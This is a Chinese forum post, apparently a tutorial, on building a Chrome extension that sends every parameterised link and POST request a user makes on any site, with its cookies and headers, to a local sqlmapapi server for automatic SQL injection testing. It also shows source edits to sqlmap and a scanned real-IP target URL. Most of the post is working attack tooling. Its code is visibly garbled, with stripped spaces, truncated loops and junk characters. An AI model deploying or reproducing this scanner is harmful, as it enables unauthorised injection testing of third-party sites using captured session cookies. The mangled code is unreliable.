来源:http://bbs.ichunqiu.com/thread-9619-1-1.html?from=ch
0x00 简介
分布式扫描好多人都写过,例如:
burp的sqli插件
Matt前辈的http://zone.wooyun.org/content/24172
猪猪侠前辈的http://zone.wooyun.org/content/21289
Ver007前辈的http://zone.wooyun.org/content/24333
0x_Jin前辈的http://zone.wooyun.org/content/24341
填上个坑填的心烦,想着也造个轮子,忙活了几天,写了一个简单的雏形
Github:https://github.com/liuxigu/ScanSqlTestchromeExtensions
在此感谢bstaint、sunshadow的帮助
Sqlmapapi本来就是为了实现分布式注入写的,在被动扫描的基础上 加节点就实现分布式了
最初想的是用chrome插件来实现代码注入
用js来获取标签的同域url,用js是防止一些站的反爬虫措施,还有对于a href指向相对链接的的情况,用js会自动补全域名.
Chrome webRequest API OnBeforeRequest获取即将请求的url
设想获取url后 喂给sqlmapapi, 将能注入的url写入到文本里,js 的 FileSystemObject gg.. 本来是准备用php实现文件io的…
talk is cheap show me the code.
0x01 Chrome manifest.json
[AppleScript]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24#!js
{
"name":"sqlInjectionTest",
"version":"0.1",
"description":"you know...",
"manifest_version":2,
"content_scripts":[{
"matches":["*://*/*"],
"js":["inject.js"]
}],
"permissions":[
"*://*/*",
"webRequest",
"webRequestBlocking"
],
"browser_action":{
"default_icon":"icon.png",
"default_title":"scan url inject"
}
}
0x02 Sqlmapapi.py code
一:固定Admin Id
Sqlmapapi启动后 是这样子:
[AppleScript]纯文本查看复制代码
?
1
2
3
4
5
6#!bash
root@kali:~/桌面/sqlmap# python sqlmapapi.py -s
[22:02:17] [INFO] Running REST-JSON API serverat'127.0.0.1:8775'..
[22:02:17] [INFO] Admin ID:7c4be58c7aab5f38cb09eb534a41d86b
[22:02:17] [DEBUG] IPC database:/tmp/sqlmapipc-5JVeNo
[22:02:17] [DEBUG] REST-JSON API server connectedtoIPC database
AdminID每次都会变,这样导致任务管理不方便,我们更改一下sqlmap的源码
定位到/sqlmap/lib/utils/api.py 的server函数
看到644行的os.urandom,直接改成一个固定字符串就行了
例如 我改成了DataStore.admin_id = hexencode('wooyun')
以后就固定是Admin ID: 776f6f79756e
还有个更简单的办法
return True
二:sqlmap扫描任务结束自动写入文本
判断当前任务是否扫描完成 访问http://127.0.0.1:8775/admin/ss/list
[AppleScript]纯文本查看复制代码
?
1
2
3
4
5
6
7
8#!python
{
"tasks":{
"4db4e3bd4410efa9":"terminated"
},
"tasks_num":1,
"success":true
}
Terminated代表任务已终止,
http://127.0.0.1:8775/scan/4db4e3bd4410efa9/data
[AppleScript]纯文本查看复制代码
?
1
2
3
4
5
6#!python
{
"data":[],
"success":true,
"error":[]
}
“data”存放了sqlmapapi检测时用的payload, “data”非空就代表当前任务是可注入的,sqlmapapi并没有自带回调方式…轮询浪费开销,这里我选择修改源码
定位到scan_data函数 ,可以看到,假如可注入,就会从data表检索数据并写入到json_data_message,表名为data, 代码向上翻,定位到将数据入库的代码
在StdDbOut类里,第230行,在insert前 插入
[AppleScript]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10#!python
withopen('/tmp/'+str(self.taskid)+'.txt','a+')asfileHandleTemp,\
closing(requests.get('http://127.0.0.1:8775/option/'+str(self.taskid)+'/list',stream=True))asreqTemp:
fileHandleTemp.write(
json.loads(reqTemp.text)['options']['url']+'\n'+
json.loads(reqTemp.text)['options']['data']+'\n'+
json.loads(reqTemp.text)['options']['Cookie']+'\n'+
json.loads(reqTemp.text)['options']['Referer']+'\n'
)
记得加载三个模块
[AppleScript]纯文本查看复制代码
?
1
2
3
4#!python
import json
import requests
fromcontextlib importclosing
本意是获取能注入的url写入到文本里,在源码里没找到继承这个类的地方…懒得去找了
访问http://127.0.0.1:8775/option/id/list
[AppleScript]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10
11#!python
Response:
{
"options":{
......
"url":[url]http://58.59.39.43:9080/wscgs/xwl.do?smid=02&bgid=01&bj=8[/url]
……
}
"success":{
...
}
0x03 inject.js code
1.
那么要过滤掉javascript::伪协议和无sql操作的href
看到有这样写的:
[AppleScript]纯文本查看复制代码
?
1
2#!js
ifre.match('^(javascript|:;|#)',_url) or _url is None or re.match('.(jpg|png|bmp|mp3|wma|wmv|gz|zip|rar|iso|pdf|txt|db)$',_url):
甚至这样的:
[AppleScript]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10#!js
filename=urlpath[i+1:len(urlpath)]
�0�2�0�2�0�2�0�2print�0�2"Filename:�0�2",filename
�0�2�0�2�0�2�0�2res=filename.split('.')
�0�2�0�2�0�2�0�2if(len(res)>1):
�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2extname=res[-1]
�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2ext=["css","js","jpg","jpeg","gif","png","bmp","html","htm","swf","ico","ttf","woff","svg","cur","woff2"]
�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2for�0�2blacklist�0�2in�0�2ext:
�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2if(extname==blacklist):
�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2�0�2return�0�2False
这两种方式假如遇到这样的url: http://xxx/aaa/ ,就会造成无意义的开销.
判断是否可以进行get注入测试,其实只需要
str.match(/[\?]/); 无get参数的页面会返回null
我们这样写: /http(s)?:\/\/ ([\w\W-]+\/)+ ([\w\W]+\?)+/;
再加上同域过滤,js中没有php那样可以在字符串中用{}引用变量的值,要在正则中拼接变量需要用RegExp对象:
[AppleScript]纯文本查看复制代码
?
1
2
3#!js
var urlLegalExpr="http(s)?:\/\/"+document.domain+"([\\/\\w\\W]+\\?)+";
var objExpr=newRegExp(urlLegalExpr,"gi");
2.
Js是在http response后执行的,要进行post注入,必须在OnBeforeRequest之前获取,chrome提供了相关的api,这个没什么可说的 ,看代码吧
inject.js code:
[AppleScript]纯文本查看复制代码
?
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121#!js
main();
functionmain(){
var urlLegalExpr="http(s)?:\/\/"+document.domain+"([\\/\\w\\W]+\\?)+";
var objExpr=newRegExp(urlLegalExpr,"gi");
urlArray=document.getElementsByTagName('a');
for(i=0;i
if(objExpr.test(urlArray[i].href)){
sqlScanTest(urlArray[i].href);
}
}
}
function sqlScanTest(url,payload){
sqlmapIpPort="http://127.0.0.1:8775";
var payload=arguments[1] ||'{"url":"'+url+'","User-Agent":"wooyun"}';
Connection('GET',sqlmapIpPort+'/task/new','',function(callback){
var response=JSON.parse(callback);
if(response.success){
Connection('POST',sqlmapIpPort+'/scan/'+response.taskid+'/start',payload,function(callback){
var responseTemp=JSON.parse(callback);
if(!responseTemp.success){
alert('urlsendtosqlmapapierror');
}
}
)
}
else{
alert('sqlmapapi create taskerror');
}
}
)
}
function Connection(Sendtype,url,content,callback){
if(window.XMLHttpRequest){
var xmlhttp=newXMLHttpRequest();
}
else{
var xmlhttp=newActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function(){
if(xmlhttp.readyState==4&&xmlhttp.status==200)
{
callback(xmlhttp.responseText);
}
}
xmlhttp.open(Sendtype,url,true);
xmlhttp.setRequestHeader("Content-Type","application/json");
xmlhttp.send(content);
}
function judgeUrl(url){
var objExpr=newRegExp(/^http(s)?:\/\/127\.0\.0\.1/);
returnobjExpr.test(url);
}
var payload={};
chrome.webRequest.onBeforeRequest.addListener(
function(details){
if(details.method=="POST"&&!judgeUrl(details.url)){
var saveParamTemp="";
for(var iindetails.requestBody.formData){
saveParamTemp+="&"+i+"="+details.requestBody.formData[i][0];
}
saveParamTemp=saveParamTemp.replace(/^&/,'');
//console.log(saveParamTemp);
payload["url"]=details.url;
payload["data"]=saveParamTemp;
}
//console.log(details);
},
{urls:[""]},
["requestBody"]);
chrome.webRequest.onBeforeSendHeaders.addListener(
function(details){
if(details.method=="POST"&&!judgeUrl(details.url)){
//var cookieTemp="",uaTemp="",refererTemp="";
for(var ecx=0;ecx
switch(details.requestHeaders[ecx].name){
case"Cookie":
payload["Cookie"]=details.requestHeaders[ecx].value;
break;
case"User-Agent":
payload["User-Agent"]=details.requestHeaders[ecx].value;
break;
case"Referer":
payload["Referer"]=details.requestHeaders[ecx].value;
break;
default:
break;
}
}
sqlScanTest("test",JSON.stringify(payload));
return{requestHeaders:details.requestHeaders};
}
},
{urls:[""]},
["requestHeaders"]);
Sqlmap能用的选项都可以在http://ip:port/option/taskid/list里查看,用到哪项写到payload里就行了,最好是做成实时刷新代理,之前写过爬虫的时候写过一个python版的,有空的话会改成js加入到inject.js里.
201602040648396999862.jpg(163.2 KB, 下载次数: 0)
下载附件保存到相册
6 小时前上传
0x04 参考文献
《使用sqlmapapi.py批量化扫描实践》http://drops.wooyun.org/tips/6653
《chrome webRequest API》https://developer.chrome.com/extensions/webRequest